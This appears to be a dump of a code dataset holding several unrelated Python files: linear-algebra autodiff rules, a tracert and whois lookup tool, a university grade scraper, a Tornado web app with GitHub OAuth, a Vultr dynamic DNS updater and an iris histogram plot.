https://arxiv.org/pdf/1909.02659.pdf\n\n Eq. 1, 2, 36 (take complex conjugate of both sides)\n\n \"\"\"\n\n du, ds, dv = g[0], g[1], g[2].H\n u, s, v = out[0], out[1], out[2].H\n\n f = fmatrix(s**2)(\"ij\")\n\n uTdu = u.T(\"im\") @ du(\"mj\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad = eye(s,\"ij\") * ds(\"i1\") \n grad = grad + f * s(\"1j\") * (uTdu(\"ij\") - uTdu.H(\"ij\")) \n grad = grad + f * s(\"i1\") * (vTdv(\"ij\") - vTdv.H(\"ij\"))\n \n\n if tn.iscomplex(x):\n grad = grad + 1j * tn.imag(eye(uTdu) * uTdu) / s(\"1j\")\n\n\n grad = u.C(\"li\") @ grad(\"ij\") @ v.T(\"jr\") \n\n\n if x.shape[0] < x.shape[1]: \n\n vvH = v(\"bm\") @ v.H(\"mr\")\n grad = grad \\\n + ((u(\"la\") / s(\"1a\")) @ dv.T(\"ab\") @ (eye(vvH) - vvH)).C\n\n return grad(*tn.union_inds(x))\n\n\n if x.shape[0] > x.shape[1]:\n\n uuH = u(\"bm\") @ u.H(\"ml\")\n grad = grad \\\n + ((v(\"ra\") / s(\"1a\")) @ du.T(\"ab\") @ (eye(uuH) - uuH)).T\n\n return grad(*tn.union_inds(x))\n\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (general) ------------------------------------------ #\n\ndef vjp_eig(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 4.77 (take complex conjugate of both sides)\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n f = fmatrix(s)(\"ij\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad1 = f * vTdv \n grad2 = f * ((v.T(\"im\") @ v.C(\"mn\")) @ (tn.real(vTdv) * eye(vTdv))(\"nj\"))\n\n grad = ds(\"1j\") * eye(s,\"ij\") + grad1 - grad2\n grad = la.inv(v.T)(\"li\") @ grad(\"ij\") @ v.T(\"jr\")\n \n if not tn.iscomplex(x):\n grad = tn.real(grad)\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (Hermitian) ---------------------------------------- #\n\ndef vjp_eigh(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 4.71 (take complex conjugate of both sides)\n\n Comments:\n\n * numpy and pytorch use UPLO=\"L\" by default\n\n * tensorflow always uses UPLO=\"L\"\n https://www.tensorflow.org/api_docs/python/tf/linalg/eigh\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n grad = eye(s,\"ij\") * ds(\"i1\")\n\n if not tn.allclose(dv, tn.space(dv).zeros()): \n grad = grad + fmatrix(s)(\"ij\") * (v.T(\"im\") @ dv(\"mj\"))\n\n grad = v(\"li\").C @ grad @ v.T(\"jr\") \n\n tl = la.tril(tn.space(grad).ones(), k=-1)\n grad = tn.real(grad) * eye(grad) \\\n + (grad(\"lr\") + grad.H(\"lr\")) * tl(\"lr\") \n \n return grad(*tn.union_inds(x))\n\n\n\n\n# --- QR decomposition ------------------------------------------------------ #\n\ndef vjp_qr(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(r, a):\n\n return la.trisolve(r, a.H, which=\"upper\").H\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(q, dq, r, dr):\n\n m = r(\"im\") @ dr.H(\"mj\") - dq.H(\"im\") @ q(\"mj\")\n\n return trisolve(r(\"jr\"), dq(\"lj\") + q(\"li\") @ hcopyltu(m)(\"ij\"))\n\n\n dq, dr = g\n q, r = out\n\n if x.shape[0] >= x.shape[1]:\n return kernel(q, dq, r, dr)(*tn.union_inds(x))\n\n x1, x2 = x[:, : x.shape[0]], x[:, x.shape[0] :]\n r1, r2 = r[:, : x.shape[0]], r[:, x.shape[0] :]\n dr1, dr2 = dr[:, : x.shape[0]], dr[:, x.shape[0] :]\n\n dx1 = kernel(q, dq(\"li\") + x2(\"lr\") @ dr2.H(\"ri\"), r1, dr1)\n dx2 = q(\"li\") @ dr2(\"ir\")\n\n return la.concat(\n dx1(\"ia\"), \n dx2(\"ib\"), \n inds=tuple(tn.union_inds(x)), \n which=\"right\"\n )\n\n\n\n\n# --- LQ decomposition ------------------------------------------------------ #\n\ndef vjp_lq(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(l, a):\n\n return la.trisolve(l.H, a, which=\"upper\")\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(l, dl, q, dq):\n\n m = l.H(\"im\") @ dl(\"mj\") - dq(\"im\") @ q.H(\"mj\")\n\n return trisolve(l(\"li\"), dq(\"ir\") + hcopyltu(m)(\"ij\") @ q(\"jr\"))\n\n\n dl, dq = g\n l, q = out\n\n if x.shape[0] <= x.shape[1]:\n return kernel(l, dl, q, dq)(*tn.union_inds(x))\n\n x1, x2 = x[: x.shape[1], :], x[x.shape[1] :, :]\n l1, l2 = l[: x.shape[1], :], l[x.shape[1] :, :]\n dl1, dl2 = dl[: x.shape[1], :], dl[x.shape[1] :, :]\n\n dx1 = kernel(l1, dl1, q, dq(\"ir\") + dl2.H(\"il\") @ x2(\"lr\"))\n dx2 = dl2(\"li\") @ q(\"ir\")\n\n return la.concat(\n dx1(\"ai\"), \n dx2(\"bi\"), \n inds=tuple(tn.union_inds(x)), \n which=\"left\"\n )\n\n\n\n\n# --- Record decomp VJPs ---------------------------------------------------- # \n\nad.makevjp(la.svd, vjp_svd)\nad.makevjp(la.eig, vjp_eig)\nad.makevjp(la.eigh, vjp_eigh)\nad.makevjp(la.qr, vjp_qr)\nad.makevjp(la.lq, vjp_lq)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of standard matrix properties and transformations ###\n### ###\n###############################################################################\n\n\n# --- Norm ------------------------------------------------------------------ #\n\ndef vjp_norm(g, out, x, order=None, **opts):\n\n \"\"\"\n https://people.maths.ox.ac.uk/gilesm/files/NA-08-01.pdf\n https://en.wikipedia.org/wiki/Norm_(mathematics)#p-norm\n\n \"\"\"\n\n if order in (None, 'fro'):\n\n return (g / out) * x.C \n\n\n if order == 'nuc':\n\n U, S, VH, error = la.svd(x)\n\n return g * (U.C @ VH.C)\n\n\n raise ValueError(\n f\"vjp_norm: invalid norm order {order} provided. The order must \"\n f\"be one of: None, 'fro', 'nuc'.\"\n )\n\n\n\n\n# --- Trace ----------------------------------------------------------------- #\n\ndef vjp_trace(g, out, x, **opts):\n\n return tn.space(x).eye() * g\n\n\n\n\n# --- Determinant ----------------------------------------------------------- #\n\ndef vjp_det(g, out, x):\n\n return g * out * la.inv(x).T\n\n\n\n\n# --- Inverse --------------------------------------------------------------- #\n\ndef vjp_inv(g, out, x):\n\n grad = -out.T(\"ij\") @ g(\"jk\") @ out.T(\"kl\")\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Diagonal -------------------------------------------------------------- #\n\ndef vjp_diag(g, out, x, inds, **opts): \n\n xinds = list(tn.union_inds(x))\n\n i = min(xinds, key=len)\n j = i.retagged(\"j\")\n k = xinds[1 - xinds.index(i)] \n\n grad = (g(i,\"1\") * tn.space(x).eye(i,j)) @ tn.space(x).eye(j,k) \n\n return tn.transpose_like(grad, x)\n\n\n\n\n# --- Concatenate matrices -------------------------------------------------- #\n\ndef vjp_concat(g, adx, out, *xs, inds, which=None, **opts): \n\n axis = {\n None: 0, \n \"left\": 0, \n \"right\": 1,\n }[which]\n \n start = sum([x.shape[axis] for x in xs[:adx]])\n size = xs[adx].shape[axis] \n\n adx_slice = [slice(None), slice(None)]\n adx_slice[axis] = slice(start, start + size)\n\n return g[tuple(adx_slice)](*tn.union_inds(xs[adx])) \n\n\n\n\n# --- Record standard linalg VJPs ------------------------------------------- #\n\nad.makevjp(la.norm, vjp_norm)\nad.makevjp(la.trace, vjp_trace)\nad.makevjp(la.det, vjp_det)\nad.makevjp(la.inv, vjp_inv)\nad.makevjp(la.diag, vjp_diag)\n\nad.makevjp(la.tril, lambda g, out, x, **opts: la.tril(g, **opts))\nad.makevjp(la.triu, lambda g, out, x, **opts: la.triu(g, **opts))\n\nad.makevjp_combo(la.concat, vjp_concat)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of linear algebra solvers ###\n### ###\n###############################################################################\n\n\n# --- Solve the equation ax = b --------------------------------------------- #\n\ndef vjpA_solve(g, out, a, b):\n\n return -la.solve(a.T, g) @ out.T\n\n\ndef vjpB_solve(g, out, a, b):\n\n return la.solve(a.T, g)\n\n\n\n\n# --- Solve the equation ax = b, assuming a is a triangular matrix ---------- #\n\ndef tri(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": la.tril, \n \"upper\": la.triu,\n }[which]\n\n\ndef opposite(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": \"upper\", \n \"upper\": \"lower\",\n }[which]\n\n\ndef vjpA_trisolve(g, out, a, b, which=None):\n\n return -tri(which)(la.trisolve(a.T, g, which=opposite(which)) @ out.T)\n \n\ndef vjpB_trisolve(g, out, a, b, which=None):\n\n return la.trisolve(a.T, g, which=opposite(which))\n\n\n\n\n# --- Record linalg solver VJPs --------------------------------------------- #\n\nad.makevjp(la.solve, vjpA_solve, vjpB_solve)\nad.makevjp(la.trisolve, vjpA_trisolve, vjpB_trisolve)\n \n\n \n\n","repo_name":"dkilda/tadpole","sub_path":"tadpole/tensorwrap/vjps/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74323685609","text":"from ipwhois import IPWhois\nimport subprocess\nimport re\n\n\ndef tracert(name):\n try:\n return subprocess.check_output(r'tracert ' + name, shell=True)\n except subprocess.CalledProcessError:\n print('ошибка tracert')\n\n\ndef who_is(ip):\n try:\n data = IPWhois(ip).lookup_whois()\n return 'ip : ' + ip + '\\n' + \\\n 'ASN : ' + data['asn'] + '\\n' + \\\n 'country : ' + data['asn_country_code'] + '\\n' + \\\n 'provider : ' + data['nets'][0]['description'] + '\\n' + \\\n 'provider address : ' + data['nets'][0]['address'] + '\\n'\n except:\n return ip + ' : ASN - None'\n\n\ndef main():\n pattern = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n while True:\n print(r'введите ip/имя сервера')\n s = input()\n if s == 'exit':\n break\n else:\n raw_data = tracert(s).decode('cp866')\n if raw_data:\n res = [who_is(ip) for ip in pattern.findall(raw_data)[1:]]\n for i in range(1, len(res) + 1):\n print('number :', i)\n print(res[i - 1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DenisBelovED/TracertExtended","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12070063606","text":"# created by WuLei on January 31 2018\n# wuleiatso@gmail.com\n\nimport jwlogin\nimport re\nfrom lxml import etree\n\nclass query(object):\n def __init__(self, session, sessionid):\n self.session = session\n self.sessionid = sessionid\n\n def get_usercode(self):\n url = 'http://202.113.110.22:8088/tjsfjw/custom/js/SetRootPath.jsp'\n header = {'Accept':'*/*',\n 'Accept-Encoding':'gzip, deflate',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Connection':'keep-alive',\n 'Cookie':'JSESSIONID=' + self.sessionid,\n 'Host':'202.113.110.22:8088',\n 'Referer':'http://202.113.110.22:8088/tjsfjw/student/wsxk.pyfadb.html?menucode=JW130713',\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\n r = self.session.get(url, headers = header)\n self.usercode = re.findall(r'G_USER_CODE = \\'(.*?)\\';', r.text)[0]\n print('user_code: ', self.usercode)\n print('user_name: ', re.findall(r'G_USER_NAME = \\'(.*?)\\';', r.text)[0])\n\n def loadinfo(self):\n url = 'http://202.113.110.22:8088/tjsfjw/student/xscj.stuckcj_data.jsp'\n params = {'sjxz':'sjxz3',\n 'ysyx':'yscj',\n 'zx':'1',\n 'fx':'1',\n 'userCode':str(self.usercode),\n 'xypjwchcnckcj':'0',\n 'pjwchckcjklpbcj':'0',\n 'xn':'2017',\n 'xn1':'2018',\n 'xq':'0',\n 'ysyxS':'on',\n 'sjxzS':'on',\n 'zxC':'on',\n 'fxC':'on',\n 'menucode_current':'JW1314'}\n headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n content = self.session.get(url, params = params, headers = headers)\n return content.text\n\n def parsescores(self, content = None):\n if content == None:\n print('query failed')\n exit(1)\n selector = etree.HTML(content)\n c = selector.xpath('/html/body/table[2]/tbody/tr')\n j=0\n for i in c:\n print(selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[2]/text()')[0] +' ' + selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[8]/text()')[0])\n j = j + 1\n\n\n def holdconnection(self):\n url = 'http://202.113.110.22:8088/tjsfjw/online/message'\n params = {'hidOption':'getOnlineMessage'}\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n r = self.session.get(url, headers = headers, params = params)\n if r.status_code == 200:\n print('holding connection')\n\ndef go():\n s, sid = jwlogin.go()\n q = query(s, sid)\n q.holdconnection()\n q.get_usercode()\n q.holdconnection()\n q.parsescores(content=q.loadinfo())\n\nif __name__ == '__main__':\n go()","repo_name":"3swu/tjsfjwlogin","sub_path":"queryscores.py","file_name":"queryscores.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20741327089","text":"import functools\nimport random\n\nimport tornado.auth\nimport tornado.escape\nimport tornado.gen\nimport tornado.httpclient\nimport tornado.web\n\nfrom tornado.web import HTTPError\nfrom tornado.web import authenticated\n\nimport peewee\n\nfrom peewee import fn\n\nfrom models import User, Repo, HMap, CSet, Token\nfrom handlers import RequestHandler\n\nclass BaseHandler(RequestHandler):\n \"\"\"Base class for all web front end handlers.\"\"\"\n\n def get_current_user(self):\n uid = self.get_secure_cookie(\"uid\")\n user = User.get(User.id == uid) if uid else None\n return user\n\n def set_current_user(self, user):\n self.set_secure_cookie(\"uid\", str(user.id))\n\n def clear_current_user(self):\n self.clear_cookie(\"uid\")\n\n def write_error(self, status_code, **kwargs):\n if status_code == 404:\n self.render(\"error/404.html\")\n else:\n self.render(\"error/gen.html\")\n\nclass HomeHandler(BaseHandler):\n \"\"\"Renders the website index page - nothing more.\"\"\"\n\n def get(self):\n self.render(\"home/index.html\")\n\nclass SearchHandler(BaseHandler):\n def get(self):\n query = tornado.escape.url_unescape(self.get_argument(\"q\", \"\"))\n\n if query:\n pattern = \"%\" + query + \"%\"\n repos = (Repo.select().join(User).alias(\"user\")\n .where(Repo.name ** pattern))\n users = User.select().where(User.name ** pattern)\n else:\n repos = []\n users = []\n\n self.render(\"search/show.html\", query=query, repos=repos, users=users)\n\nclass UserHandler(BaseHandler):\n def get(self, username):\n try:\n user = User.select().where(User.name == username).get()\n self.render(\"user/show.html\", title=user.name, user=user)\n except User.DoesNotExist:\n raise HTTPError(404)\n\nclass EditUserHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Edit account information\"\n self.render(\"user/edit.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n user = self.current_user\n user.name = self.get_argument(\"username\", None)\n user.homepage_url = self.get_argument(\"homepage\", None)\n user.avatar_url = self.get_argument(\"avatar\", None)\n user.email = self.get_argument(\"email\", None)\n user.save()\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass RepoHandler(BaseHandler):\n def get(self, username, reponame):\n try:\n repo = (Repo.select().join(User).alias(\"user\")\n .where((User.name == username) & (Repo.name == reponame))\n .get())\n title = repo.user.name + \"/\" + repo.name\n\n timemap = self.get_query_argument(\"timemap\", \"false\") == \"true\"\n datetime = self.get_query_argument(\"datetime\", None)\n key = self.get_query_argument(\"key\", None)\n\n if key and not timemap:\n self.render(\"repo/memento.html\", repo=repo, key=key,\n datetime=datetime)\n elif key and timemap:\n self.render(\"repo/history.html\", repo=repo, key=key)\n else:\n cs = (CSet.select(fn.distinct(CSet.hkey))\n .where(CSet.repo == repo).limit(5).alias(\"cs\"))\n samples = (HMap.select(HMap.val)\n .join(cs, on=(HMap.sha == cs.c.hkey_id)))\n self.render(\"repo/show.html\", title=title, repo=repo,\n samples=list(samples))\n except Repo.DoesNotExist:\n raise HTTPError(404)\n\nclass CreateRepoHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Create a new repository\"\n self.render(\"repo/new.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n reponame = self.get_argument(\"reponame\", None)\n desc = self.get_argument(\"description\", None)\n user = self.current_user\n if not reponame:\n self.redirect(self.reverse_url(\"web:create-repo\"))\n return\n repo = Repo.create(user=user, name=reponame, desc=desc)\n self.redirect(self.reverse_url(\"web:repo\", user.name, repo.name))\n\nclass SettingsHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Account settings\"\n self.render(\"settings/index.html\", title=title, user=user,\n tokens=user.tokens)\n\n def on_finish(self):\n q = Token.update(seen=True).where(Token.user == self.current_user)\n q.execute()\n super(SettingsHandler, self).on_finish()\n\nclass NewTokenHandler(BaseHandler):\n @authenticated\n def get(self):\n self.render(\"tokens/new.html\")\n\n @authenticated\n def post(self):\n user = self.current_user\n desc = self.get_argument(\"description\")\n value = \"%040x\" % random.randrange(16**40)\n # TODO: Retry on duplicate token value (peewee.IntegrityError)?\n Token.create(user=user, value=value, desc=desc)\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass DelTokenHandler(BaseHandler):\n @authenticated\n def post(self, id):\n try:\n token = Token.get((Token.user == self.current_user) & (Token.id == id))\n token.delete_instance()\n self.redirect(self.reverse_url(\"web:settings\"))\n except:\n raise HTTPError(404)\n\nclass JoinHandler(BaseHandler):\n \"\"\"Allows users to join through email and password or GitHub OAuth.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"join/new.html\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # email = self.get_argument(\"email\")\n # name = self.get_argument(\"username\")\n # pass, salt = ...\n # try:\n # User.create(name=username, email=email, pass=pass, salt=salt)\n # except peewee.IntegrityError:\n # self.redirect(self.reverse_url(\"web:join\"))\n # self.redirect(\"/\")\n\nclass AuthHandler(BaseHandler):\n \"\"\"Authenticates users via username and password.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"auth/new.html\", title=\"Sign in - tailr\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # username = self.get_argument(\"username\")\n # user = User.get(User.name == username)\n # # confirm password, else deny access\n # if user... == ...:\n # self.set_current_user(user)\n # self.redirect(self.get_argument(\"next\", \"/\"))\n # else:\n # self.redirect(self.reverse_url(\"web:auth\"))\n\nclass GitHubOAuth2Mixin(tornado.auth.OAuth2Mixin):\n \"\"\"GitHub authentication using OAuth2.\"\"\"\n\n _OAUTH_ACCESS_TOKEN_URL = \"https://github.com/login/oauth/access_token\"\n _OAUTH_AUTHORIZE_URL = \"https://github.com/login/oauth/authorize\"\n _OAUTH_SETTINGS_KEY = \"github_oauth\"\n\n _GITHUB_API_BASE_URL = \"https://api.github.com\"\n\n @tornado.auth._auth_return_future\n def get_authenticated_user(self, redirect_uri, code, callback):\n http = self.get_auth_http_client()\n\n body = tornado.auth.urllib_parse.urlencode({\n \"redirect_uri\": redirect_uri,\n \"code\": code,\n \"client_id\": self.settings[self._OAUTH_SETTINGS_KEY][\"key\"],\n \"client_secret\": self.settings[self._OAUTH_SETTINGS_KEY][\"secret\"],\n })\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n }\n\n http.fetch(self._OAUTH_ACCESS_TOKEN_URL,\n functools.partial(self._on_access_token, callback),\n method=\"POST\", headers=headers, body=body)\n\n def _on_access_token(self, future, response):\n if response.error:\n msg = \"GitHub auth error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n args = tornado.escape.json_decode(response.body)\n\n self.github_request(\"/user\",\n functools.partial(self._on_user_info, future),\n access_token=args[\"access_token\"])\n\n @tornado.auth._auth_return_future\n def github_request(self, path, callback, access_token=None, **args):\n url = self._GITHUB_API_BASE_URL + path\n\n headers = {\n \"User-Agent\": \"tailr\",\n \"Accept\": \"application/json\",\n }\n\n if access_token is not None:\n headers[\"Authorization\"] = \"token %s\" % access_token\n\n callback = functools.partial(self._on_github_request, callback)\n\n http = self.get_auth_http_client()\n\n http.fetch(url, callback, headers=headers)\n\n def _on_github_request(self, future, response):\n if response.error:\n msg = \"GitHub API error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n result = tornado.escape.json_decode(response.body)\n future.set_result(result)\n\n def _on_user_info(self, future, info):\n future.set_result(info)\n\n def get_auth_http_client(self):\n return tornado.httpclient.AsyncHTTPClient()\n\nclass GitHubAuthHandler(BaseHandler, GitHubOAuth2Mixin):\n \"\"\"Authenticates users via GitHub OAuth.\"\"\"\n\n @tornado.gen.coroutine\n def get(self):\n if self.get_argument(\"code\", False):\n info = yield self.get_authenticated_user(\n redirect_uri=self.redirect_uri,\n code=self.get_argument(\"code\"))\n\n github_id = info.get(\"id\", None)\n\n if github_id is None:\n self.redirect(self.reverse_url(\"web:auth\"))\n return\n\n try:\n user = User.get(User.github_id == github_id)\n except User.DoesNotExist:\n user = None\n\n if user is None:\n data = dict(\n name=info.get(\"login\"),\n github_id=github_id,\n homepage_url=info.get(\"html_url\", None),\n avatar_url=info.get(\"avatar_url\", None),\n email=info.get(\"email\", None),\n confirmed=True)\n\n try:\n # try to use the users GitHub login name\n user = User.create(**data)\n except peewee.IntegrityError:\n # assign a temporary, random name\n data[\"name\"] = \"%040x\" % random.randrange(16**40)\n user = User.create(**data)\n\n self.set_current_user(user)\n\n self.redirect(self.get_argument(\"next\", \"/\"))\n else:\n # TODO: pass additional random `state` parameter and\n # check the value in the conditional branch above\n yield self.authorize_redirect(\n redirect_uri=self.redirect_uri,\n client_id=self.settings[\"github_oauth\"][\"key\"],\n response_type=\"code\",\n scope=[\"user:email\"])\n\n @property\n def redirect_uri(self):\n return \"%s://%s%s\" % (self.request.protocol,\n self.request.host, \"/auth/github\")\n\nclass DeauthHandler(BaseHandler):\n @authenticated\n def post(self):\n self.clear_current_user()\n self.redirect(\"/\")\n\nclass ErrorHandler(BaseHandler):\n \"\"\"Generates an error response with ``status_code`` for all requests.\"\"\"\n\n def initialize(self, status_code):\n self.set_status(status_code)\n\n def prepare(self):\n super(ErrorHandler, self).prepare()\n raise tornado.web.HTTPError(self.get_status())\n\n def check_xsrf_cookie(self):\n pass\n","repo_name":"pmeinhardt/tlr","sub_path":"handlers/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70035382569","text":"#!/usr/bin/env python3\n'''\nDynamic DNS service for Vultr\nBy Andy Smith\nhttps://ajsmith.us/\nhttps://github.com/andyjsmith/Vultr-Dynamic-DNS\n'''\n\nimport json\nimport sys\nimport requests\n\n# Import the values from the configuration file\nwith open(\"config.json\") as config_file:\n\tconfig = json.load(config_file) # Convert JSON to Python\n\ndomain = config[\"domain\"]\napi_key = config[\"api_key\"]\ndynamic_records = config[\"dynamic_records\"]\n\n# Get the public IP of the server\nip = requests.get(\"https://ip4.seeip.org\").text\ntry:\n\tipv6 = requests.get(\"https://ip6.seeip.org\", timeout=10).text\nexcept (requests.ConnectionError, requests.exceptions.Timeout) as e:\n\tprint(f'Couldn\\'t get IPv6 address, using IPv4 only.')\n\tipv6 = None\n\nresponse = requests.get(\"https://api.vultr.com/v2/domains/{}/records?per_page=500\".format(domain), headers={\"Authorization\": \"Bearer \" + api_key})\n\n# Get the list of DNS records from Vultr to translate the record name to recordid\nraw_response = response.text\nif \"is not authorized\" in raw_response:\n\tprint(\"There was an error. You are not authorized to use the API. Details are below.\")\n\tprint(\"NOTE: If using IPv6, or an IPv6 address is displayed below, you need to go to your account API settings and click Allow all IPv6.\")\n\tprint(\"Error returned from Vultr API:\")\n\ntry:\n\tresponse.raise_for_status()\nexcept requests.HTTPError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ntry:\n\traw_records = json.loads(raw_response)\nexcept json.decoder.JSONDecodeError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ndef get_records_to_change(record_type, ip):\n\t# Filter out other records besides A/AAAA records\n\trecords_to_check = [\n\t\trecord\n\t\tfor record in raw_records[\"records\"]\n\t\tif record[\"type\"] == record_type and record[\"name\"] in dynamic_records\n\t]\n\n\trecords_to_change = [\n\t\trecord\n\t\tfor record in records_to_check\n\t\tif record[\"data\"] != ip\n\t]\n\n\tfor record in records_to_change:\n\t\trecord[\"new_ip\"] = ip\n\n\treturn records_to_check, records_to_change\n\ncheck_ipv4, change_ipv4 = get_records_to_change(\"A\", ip)\ncheck_ipv6, change_ipv6 = get_records_to_change(\"AAAA\", ipv6) if ipv6 is not None else ([], [])\n\n# Cancel if no records from Vultr match the config file\nif len(check_ipv4+check_ipv6) == 0:\n\tprint(\"Configuration error, no records to change.\")\n\tsys.exit(1)\n\nrecords_to_change = change_ipv4 + change_ipv6\nif len(records_to_change) == 0:\n\tprint(\"IP address has not changed. No records have been updated.\")\n\tsys.exit(0)\n\nchanges = sorted(set(\n\t(record[\"data\"], record[\"new_ip\"])\n\tfor record in records_to_change\n))\n\nprint(\"IP has changed since last checking.\")\nfor old_ip, new_ip in changes:\n\tprint(f\"Old IP on Vultr: {old_ip}, current server IP: {new_ip}\")\n\n# Update the records in Vultr with the new IP address\nfor record in records_to_change:\n\tpayload = {\"data\": record[\"new_ip\"]}\n\tresponse = requests.patch(\"https://api.vultr.com/v2/domains/{}/records/{}\".format(domain, record[\"id\"]), json=payload, headers={\"Authorization\": \"Bearer \" + api_key})\n\tname = record[\"name\"]\n\tif name == \"\":\n\t\tname = \"@\"\n\tif \"error\" in response.text:\n\t\tprint(\"Error returned from Vultr API:\")\n\t\tprint(response.text)\n\telse:\n\t\tprint(f\"Changed {name}/{record['type']} ({record['id']}) to {record['new_ip']} in {domain}\")\n","repo_name":"andyjsmith/Vultr-Dynamic-DNS","sub_path":"ddns.py","file_name":"ddns.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"33998696076","text":"# Fiona O'Riordan 28 March 2019 \n# Project Iris Data Set\n# Create histograms for all 4 variables in the data set distinctly showing an approximate frequency distribution of each of the quantitative variables in the set.\n# Adapted from:\n# https://machinelearningmastery.com/machine-learning-in-python-step-by-step/ [18]\n# https://www.youtube.com/watch?v=r75BPh1uk38 [19]\n# https://stackoverflow.com/a/19603918/11250489 [20]\n# https://stackoverflow.com/questions/37970424/what-is-the-difference-between-drawing-plots-using-plot-axes-or-figure-in-matpl/37970713 [21]\n# import the pandas libary in order to use the read_csv function below and rename as pd \nimport pandas as pd\n# import the matplotlib library class pyplot in order to use the show function below and rename as plt\nimport matplotlib.pyplot as plt\n\n\n# url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\" \nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class'] \n# load the data by reading in the iris csv\niris = pd.read_csv(\"iris.csv\", names=names)\n\n# create a histogram for all the 4 variables \n# the default number of bins =10 but set the number of bins = 20 so that we can see the data grouped into smaller ranges.\n# plt.hist(bins=20)\n\n# creating the histograms for all 4 variables distinctly so that I can label \n# and color each chart distinctly\n\n# name the output file \nplt.figure('Histogram1')\nplt.subplot(2,2,1)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('petal-width')\n\n\nplt.subplot(2,2,2)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.title('petal-length')\n\nplt.subplot(2,2,3)\niris['sepal-length'].hist(bins=20)\n# create x axis label\nplt.xlabel('range')\n# create an y axis label\nplt.ylabel('frequency')\nplt.title('sepal-length')\n\nplt.subplot(2,2,4)\niris['sepal-width'].hist(bins=20)\n# create an x axis label\nplt.xlabel('range')\n# create an y axis label\nplt.ylabel('frequency')\nplt.title('sepal-width')\n\n\n# generate a file to output the graph\nplt.show()\n\n","repo_name":"fionaoriordan/52445_19_iris","sub_path":"histiris.py","file_name":"histiris.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4869649203","text":"# 